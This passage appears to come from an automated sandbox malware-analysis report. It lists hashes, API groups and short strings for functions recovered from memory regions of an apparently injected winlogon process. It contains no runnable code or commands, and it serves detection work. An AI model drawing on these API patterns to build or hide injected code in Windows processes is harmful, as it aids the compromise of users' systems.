                                                                      • Instruction ID: 66de38e17f75016d2cfb8723aa9e1bc5d7c9f81ec31e093b1d0b86382275e46c
                                                                      • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                                      • Instruction Fuzzy Hash: 30314732721B95C3EB159F26E9816ADFBA0BF44B84F088432AE4C47B55EF34D4B18700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID: $nya-
                                                                      • API String ID: 756756679-1266920357
                                                                      • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                                      • Instruction ID: fc654c6014bd52aef4d720a77ec2054f18dc03fd3c3b3d87c1ce58ef014babe4
                                                                      • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                                      • Instruction Fuzzy Hash: 6D316D32721B96C2EB61DF2AE9416ADF3A1BF54B84F084036AF4D07B55EF34C4618B00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                      • String ID: !-M
                                                                      • API String ID: 2718003287-3625753649
                                                                      • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                                      • Instruction ID: e1d4b231dd92484d0b0f185349a0891b1549448bbed80b83fd13b0c10210e358
                                                                      • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                                      • Instruction Fuzzy Hash: 5ED1DC32724A84CAE716CFA9D4403ECBBB1FB54B98F444226DE5EA7B99DE34C116C740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$Value$FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 365477584-0
                                                                      • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                                      • Instruction ID: 8ed34a85f941ee1fb7607de18cba6ad79ac5c3f79eaf45c85416a8e1f2596f9e
                                                                      • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                                      • Instruction Fuzzy Hash: 49115E313392C0CAFA186771E8553EEB252AF85B96F944637AC6F567CACE2CC4018750
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$Value$FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 365477584-0
                                                                      • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                                      • Instruction ID: 2edc8f6c9fcb7790243b823b553f0d6562bee48b0a64f524eb4d00ed446016ff
                                                                      • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                                      • Instruction Fuzzy Hash: 37112E353302C0C3FA596B31E8553EEBA52AF85794F544637ACAE5A3CADE3CD5214340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$Value$FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 365477584-0
                                                                      • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                                      • Instruction ID: d8c3559837e56566af46c0c28be9736a7e53cb542f7649a8cfd4671e6f67c343
                                                                      • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                                      • Instruction Fuzzy Hash: F3114C313302D2C2FA586731E8517EEB292AFC57A4F645637AC6F577CADE28C4018B40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                      • String ID:
                                                                      • API String ID: 517849248-0
                                                                      • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                                      • Instruction ID: d9c5abf8c6d7e949e863a241229034f7ab900d42a79fc14c2b598347979133df
                                                                      • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                                      • Instruction Fuzzy Hash: D901D731724A84C6EB14DB12E85879EB7A1FB88FD1F8840369E9E83754DE39C985C790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                      • String ID:
                                                                      • API String ID: 517849248-0
                                                                      • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                                      • Instruction ID: 8fc7cceeacd61fb45096f4f24d697a589d209a49c552a0157010115bc04f8cbb
                                                                      • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                                      • Instruction Fuzzy Hash: 40011B31724A80C6EB24DB12E89879DB7A1FF88FC1F4940369E5E47754DE78C985C740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                      • String ID:
                                                                      • API String ID: 517849248-0
                                                                      • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                                      • Instruction ID: 99b476646367142c0c6fda76bf2fa58fbeafd75e846749b42848e904e3af0d9c
                                                                      • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                                      • Instruction Fuzzy Hash: 35011B31724A81C6EB14DB12E85879EB3A2FB88FC0F4841369E5E43754DE3CC985C740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                      • String ID:
                                                                      • API String ID: 449555515-0
                                                                      • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                                      • Instruction ID: ec5cbc5b675887a2cd19e28577ba679cdf099cfa3344ac30a406abee5d9e5dd1
                                                                      • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                                      • Instruction Fuzzy Hash: 8A011775226B80C6FB24DB61E84879DB7A0BF48B85F04043ACE4E463A5EF3EC4488B04
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                      • String ID:
                                                                      • API String ID: 449555515-0
                                                                      • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                                      • Instruction ID: 2f9c0cfc51ba5fd5bdfcf4159f9d96f753f0c205f48075ef7ae6cf098a274bc4
                                                                      • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                                      • Instruction Fuzzy Hash: D7010075621780C3FB299B61E898B9DB7A0BF44B45F18043ADE4E067A4EF3DC458C745
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                      • String ID:
                                                                      • API String ID: 449555515-0
                                                                      • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                                      • Instruction ID: c634941e9789a9e5c594aaa3ca5c4c5b57d3c5671edd2915774813aec4832e90
                                                                      • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                                      • Instruction Fuzzy Hash: D0012975221B80C3FB249B21E85979EB3A1BF48B85F04003ACE4E063A5EF3DC548CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                      • String ID: !-M
                                                                      • API String ID: 2933794660-3625753649
                                                                      • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                                      • Instruction ID: f64786db3d27afa61429b3e35815fb64fae8c303434e7dabffc6042b3af8178e
                                                                      • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                                      • Instruction Fuzzy Hash: 7C11D636761B44CAEB008F60E8953E973A4FB59758F441A26EE6D867A4EF78C1548340
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                      • String ID: \\?\
                                                                      • API String ID: 2719912262-4282027825
                                                                      • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                                      • Instruction ID: c6fbde9c69c35a39da949cfd57bc54b20fb5d5cea942bf9e48fea89f1c2815cc
                                                                      • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                                      • Instruction Fuzzy Hash: C9F03C723246C5D2EB209B21F98839DB761FB84B89F8440329E4D86958DE6DC689CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                      • String ID: \\?\
                                                                      • API String ID: 2719912262-4282027825
                                                                      • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                                      • Instruction ID: a02c39475f3aef5e4f6d2f64f2629c219650c9661f76a054cee3dc0a61cf8639
                                                                      • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                                      • Instruction Fuzzy Hash: E9F04F723246C5D2EB209B25F9C439DF761FB84B89F888033DE4D46959DEACC698CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                      • String ID: \\?\
                                                                      • API String ID: 2719912262-4282027825
                                                                      • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                                      • Instruction ID: d1ab4dfb3c9d27a6a7968ceeb6105a01d440b9fb3452b37df00ce152cce2d918
                                                                      • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                                      • Instruction Fuzzy Hash: 08F03C723246C5D2EB209B21F99439EB362FB84B88FC441369E4D46958EE6CC698CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                                      • Instruction ID: 623c3f0f95c557c4f792dfa4a5f530112727b10765cff5c8b925d725715220c7
                                                                      • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                                      • Instruction Fuzzy Hash: 9DF06D71224B81C5FB109B24E8983ADB760BF897A5F94063A9E6E451E4CF29C448C200
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CombinePath
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3422762182-91387939
                                                                      • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                                      • Instruction ID: 19721f659298e70316365141a92f13f9d84cdd604a3c9790b0bb46672ba03d0a
                                                                      • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                                      • Instruction Fuzzy Hash: FFF0D474628BC0C2EB549B12F95829EBB61BF48FC5F889032EE5E47B59DE6CC446C600
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                                      • Instruction ID: aab2f137679bc762802ead754d232dc4d9b421bf514de914cfdf248a393e817b
                                                                      • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                                      • Instruction Fuzzy Hash: 6EF09071221781C2FB199B24E8843EDB720EF897A4F58033ADE6E451E4CF2CC448C300
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CombinePath
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3422762182-91387939
                                                                      • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                                      • Instruction ID: 2c7e626d0cd91d46b9ac582cedb05060adeea54e096e85cd6848d24821f55007
                                                                      • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                                      • Instruction Fuzzy Hash: 16F05874724BC0C2EB198B16F99419DFA61AF48FC4F488032EE4E47B18CEA8C455C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
